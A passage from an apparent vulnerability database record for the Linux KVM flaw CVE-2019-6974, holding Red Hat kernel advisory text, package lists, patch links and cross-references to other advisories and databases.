255\nCPUs [rhel-7.6.z] (BZ#1689120)\n\n* mpt3sas_cm0: fault_state(0x2100)! [rhel-7.6.z] (BZ#1689379)\n\n* rwsem in inconsistent state leading system to hung [rhel-7.6.z]\n(BZ#1690323)\n\nUsers of kernel are advised to upgrade to these updated packages, which fix\nthese bugs. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1671904 - CVE-2019-7221 Kernel: KVM: nVMX: use-after-free of the hrtimer for emulation of the preemption timer\n1671913 - CVE-2019-6974 Kernel: KVM: potential use-after-free via kvm_ioctl_create_device()\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkernel-3.10.0-957.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-957.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-957.12.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-957.12.1.el7.x86_64.rpm\nperf-3.10.0-957.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\npython-perf-3.10.0-957.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-957.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nkernel-3.10.0-957.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-957.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-957.12.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-957.12.1.el7.x86_64.rpm\nperf-3.10.0-957.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\npython-perf-3.10.0-957.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-957.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkernel-3.10.0-957.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-957.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-957.12.1.el7.noarch.rpm\n\nppc64:\nkernel-3.10.0-957.12.1.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-957.12.1.el7.ppc64.rpm\nkernel-debug-3.10.0-957.12.1.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-957.12.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-957.12.1.el7.ppc64.rpm\nkernel-devel-3.10.0-957.12.1.el7.ppc64.rpm\nkernel-headers-3.10.0-957.12.1.el7.ppc64.rpm\nkernel-tools-3.10.0-957.12.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-957.12.1.el7.ppc64.rpm\nperf-3.10.0-957.12.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm\npython-perf-3.10.0-957.12.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm\n\nppc64le:\nkernel-3.10.0-957.12.1.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-957.12.1.el7.ppc64le.rpm\nkernel-debug-3.10.0-957.12.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-957.12.1.el7.ppc64le.rpm\nkernel-devel-3.10.0-957.12.1.el7.ppc64le.rpm\nkernel-headers-3.10.0-957.12.1.el7.ppc64le.rpm\nkernel-tools-3.10.0-957.12.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-957.12.1.el7.ppc64le.rpm\nperf-3.10.0-957.12.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm\npython-perf-3.10.0-957.12.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm\n\ns390x:\nkernel-3.10.0-957.12.1.el7.s390x.rpm\nkernel-debug-3.10.0-957.12.1.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-957.12.1.el7.s390x.rpm\nkernel-debug-devel-3.10.0-957.12.1.el7.s390x.rpm\nkernel-debuginfo-3.10.0-957.12.1.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-957.12.1.el7.s390x.rpm\nkernel-devel-3.10.0-957.12.1.el7.s390x.rpm\nkernel-headers-3.10.0-957.12.1.el7.s390x.rpm\nkernel-kdump-3.10.0-957.12.1.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-957.12.1.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-957.12.1.el7.s390x.rpm\nperf-3.10.0-957.12.1.el7.s390x.rpm\nperf-debuginfo-3.10.0-957.12.1.el7.s390x.rpm\npython-perf-3.10.0-957.12.1.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-957.12.1.el7.s390x.rpm\n\nx86_64:\nbpftool-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-957.12.1.el7.x86_64.rpm\nperf-3.10.0-957.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\npython-perf-3.10.0-957.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nkernel-debug-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-957.12.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-957.12.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm\n\nppc64le:\nkernel-debug-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-957.12.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-957.12.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-957.12.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-957.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkernel-3.10.0-957.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-957.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-957.12.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-957.12.1.el7.x86_64.rpm\nperf-3.10.0-957.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\npython-perf-3.10.0-957.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-957.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-6974\nhttps://access.redhat.com/security/cve/CVE-2019-7221\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXL8hr9zjgjWX9erEAQhpRA//SO28D0BzCiZeNMWg7p//rAc9DGgsNxnq\nCMBTE2lJGOOt0DXTAw9Y3h/p46aA1UUbGmjUtL/Vvu0RUpuuPTOa3hzviavXVGBu\nPLh+QHRw9E9NBi90T24R2M0CeuUCVDn2UUqIWia7d5bb3VuS6zCjP8cq9bBa7kBN\n/bpYXeCv38pLGDU2H8P8N7EY4pFJBXp7CpiuLvsMgxNfUlxEZh913BfStDHWJAg2\nyi9NdCNtG+3hFB3LhLEedYTGxfZmuNBp8K9D6en1RryideGeyyjGiKKShRGclD+o\nKOnuXrPuHdS5fO1ci8FzymQapQSzUWjuwYXmqFAaPLLOGesGgb1wiCKgqLN3+3Oy\njjlDtD8lkiZDNwDRs27WOkQMzsV/+J0cUAQOoP0KbetSQSJuRLXD0Kkss0c8kpO6\nW7YVpwVnMioe0jFtpNu8OtjIgsTRycZ+Z01Mr7U/gH9J7i5Dysvtil+2i2xBPnM5\n+vLPIDzreB+pbG5BPrIUgM/CkYh5Yltq4nbiifhWXdSxR/t0a06in60SbDezB6Lt\nSnQavsmJSZBQ5iEhQABcMNChZPeZj1N5haC4ZFP8XD9gJLZyrNqL1tBLzVr4xhzx\n+4Trsi6td3ZuQe0wdX2rS07oIk6Tjc2yxNaiGMvM4NPYt4ZOswZvyQYk4QPJ2VRN\nzd1Qi+4M27U=IoLu\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. 7.4) - noarch, x86_64\n\n3. \n\nBug Fix(es):\n\n* guest softlockup in mem_cgroup_reparent_charges with 800GB guests\n(BZ#1770111)\n\n* [RHEL7.7] Refined TSC clocksource calibration occasionally fails on some\nSkyLake-X servers (BZ#1775682)\n\n4. \n\nM. 7) - aarch64, noarch, ppc64le\n\n3. \n\nBug Fix(es):\n\n* [kernel-alt]: BUG: unable to handle kernel NULL pointer IP:\ncrypto_remove_spawns+0x118/0x2e0 (BZ#1536967)\n\n* [HPE Apache] update ssif max_xmit_msg_size limit for multi-part messages\n(BZ#1610534)\n\n* RHEL-Alt-7.6 - powerpc/pseries: Fix unitialized timer reset on migration\n/ powerpc/pseries/mobility: Extend start/stop topology update scope (LPM)\n(BZ#1673613)\n\n* RHEL-Alt-7.6 - s390: sha3_generic module fails and triggers panic when in\nFIPS mode (BZ#1673979)\n\n* RHEL-Alt-7.6 - System crashed after oom - During ICP deployment\n(BZ#1710304)\n\n* kernel-alt: Race condition in hashtables [rhel-alt-7.6.z] (BZ#1712127)\n\n* RHEL-Alt-7.6 - OP930:PM_Test:cpupower -r command set values for first 3\ncores in quad and misses last core. (CORAL) (BZ#1717836)\n\n* RHEL-Alt-7.6 - disable runtime NUMA remapping for PRRN/LPM/VPHN\n(BZ#1717906)\n\n* fragmented packets timing out (BZ#1729066)\n\n* Backport TCP follow-up for small buffers (BZ#1733617)\n\nEnhancement(s):\n\n* RHEL-Alt-7.6 - perfevent PMDA cannot create file descriptors for reading\nnest events using the perf API (pcp/kernel) (CORAL) (BZ#1723036)\n\n4",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-6974"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-001392"
      },
      {
        "db": "BID",
        "id": "107127"
      },
      {
        "db": "VULHUB",
        "id": "VHN-158409"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-6974"
      },
      {
        "db": "PACKETSTORM",
        "id": "152379"
      },
      {
        "db": "PACKETSTORM",
        "id": "152369"
      },
      {
        "db": "PACKETSTORM",
        "id": "152370"
      },
      {
        "db": "PACKETSTORM",
        "id": "152598"
      },
      {
        "db": "PACKETSTORM",
        "id": "155951"
      },
      {
        "db": "PACKETSTORM",
        "id": "152374"
      },
      {
        "db": "PACKETSTORM",
        "id": "154553"
      }
    ],
    "trust": 2.7
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-158409",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=46388",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-158409"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-6974"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-6974",
        "trust": 3.6
      },
      {
        "db": "BID",
        "id": "107127",
        "trust": 2.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "46388",
        "trust": 2.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-001392",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "151690",
        "trust": 0.7
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201902-612",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "155951",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "155466",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.0675",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.0927.3",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0151",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4349",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4486",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "152598",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "152593",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-158409",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-6974",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "152379",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "152369",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "152370",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "152374",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154553",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-158409"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-6974"
      },
      {
        "db": "BID",
        "id": "107127"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-001392"
      },
      {
        "db": "PACKETSTORM",
        "id": "152379"
      },
      {
        "db": "PACKETSTORM",
        "id": "152369"
      },
      {
        "db": "PACKETSTORM",
        "id": "152370"
      },
      {
        "db": "PACKETSTORM",
        "id": "152598"
      },
      {
        "db": "PACKETSTORM",
        "id": "155951"
      },
      {
        "db": "PACKETSTORM",
        "id": "152374"
      },
      {
        "db": "PACKETSTORM",
        "id": "154553"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201902-612"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-6974"
      }
    ]
  },
  "id": "VAR-201902-0242",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-158409"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T20:19:24.838000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ChangeLog-4.14.99",
        "trust": 0.8,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v4.x/changelog-4.14.99"
      },
      {
        "title": "ChangeLog-4.19.21",
        "trust": 0.8,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v4.x/changelog-4.19.21"
      },
      {
        "title": "ChangeLog-4.20.8",
        "trust": 0.8,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v4.x/changelog-4.20.8"
      },
      {
        "title": "ChangeLog-4.9.156",
        "trust": 0.8,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v4.x/changelog-4.9.156"
      },
      {
        "title": "kvm: fix kvm_ioctl_create_device() reference counting (CVE-2019-6974)",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/cfa39381173d5f969daf43582c95ad679189cbc9"
      },
      {
        "title": "kvm: fix kvm_ioctl_create_device() reference counting (CVE-2019-6974)",
        "trust": 0.8,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cfa39381173d5f969daf43582c95ad679189cbc9"
      },
      {
        "title": "Linux kernel Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=89404"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20190818 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20190833 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20200103 - security advisory"
      },
      {
        "title": "Red Hat: CVE-2019-6974",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2019-6974"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20193967 - security advisory"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2019-6974"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2019-1165",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2019-1165"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2019-1165",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2019-1165"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3933-1"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM QRadar Network Security is affected by Linux kernel vulnerabilities (CVE-2019-7221, CVE-2019-6974, CVE-2018-17972, CVE-2018-9568)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=3834ad0670b59206d9d7424b96a80d4a"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-trusty vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3933-2"
      },
      {
        "title": "Ubuntu Security Notice: linux-hwe, linux-aws-hwe, linux-azure, linux-gcp, linux-oracle vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3931-2"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-gcp, linux-kvm, linux-oem, linux-oracle, linux-raspi2 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3931-1"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-azure, linux-gcp, linux-kvm, linux-raspi2 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3930-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-hwe, linux-azure vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3930-2"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2019",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=0cf12ffad0c479958deb0741d0970b4e"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-xenial, linux-aws vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3932-2"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3932-1"
      },
      {
        "title": "IBM: IBM Security Bulletin: Vulnerabilities in the Linux Kernel affect PowerKVM",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=3e8fb0a522dbdc0368aab05e3c3fb62c"
      },
      {
        "title": "Paper310",
        "trust": 0.1,
        "url": "https://github.com/sec20-paper310/paper310 "
      },
      {
        "title": "cve_diff_checker",
        "trust": 0.1,
        "url": "https://github.com/lcatro/cve_diff_checker "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/vincent-deng/veracode-container-security-finding-parser "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-6974"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-001392"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201902-612"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-362",
        "trust": 1.9
      },
      {
        "problemtype": "CWE-416",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-158409"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-001392"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-6974"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://access.redhat.com/errata/rhsa-2020:0103"
      },
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/107127"
      },
      {
        "trust": 2.4,
        "url": "https://support.f5.com/csp/article/k11186236"
      },
      {
        "trust": 2.4,
        "url": "https://access.redhat.com/errata/rhsa-2019:3967"
      },
      {
        "trust": 2.3,
        "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=1765"
      },
      {
        "trust": 2.1,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v4.x/changelog-4.19.21"
      },
      {
        "trust": 2.1,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v4.x/changelog-4.20.8"
      },
      {
        "trust": 2.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-6974"
      },
      {
        "trust": 2.0,
        "url": "https://access.redhat.com/errata/rhsa-2019:0818"
      },
      {
        "trust": 1.9,
        "url": "https://access.redhat.com/errata/rhsa-2019:2809"
      },
      {
        "trust": 1.9,
        "url": "https://usn.ubuntu.com/3933-1/"
      },
      {
        "trust": 1.8,
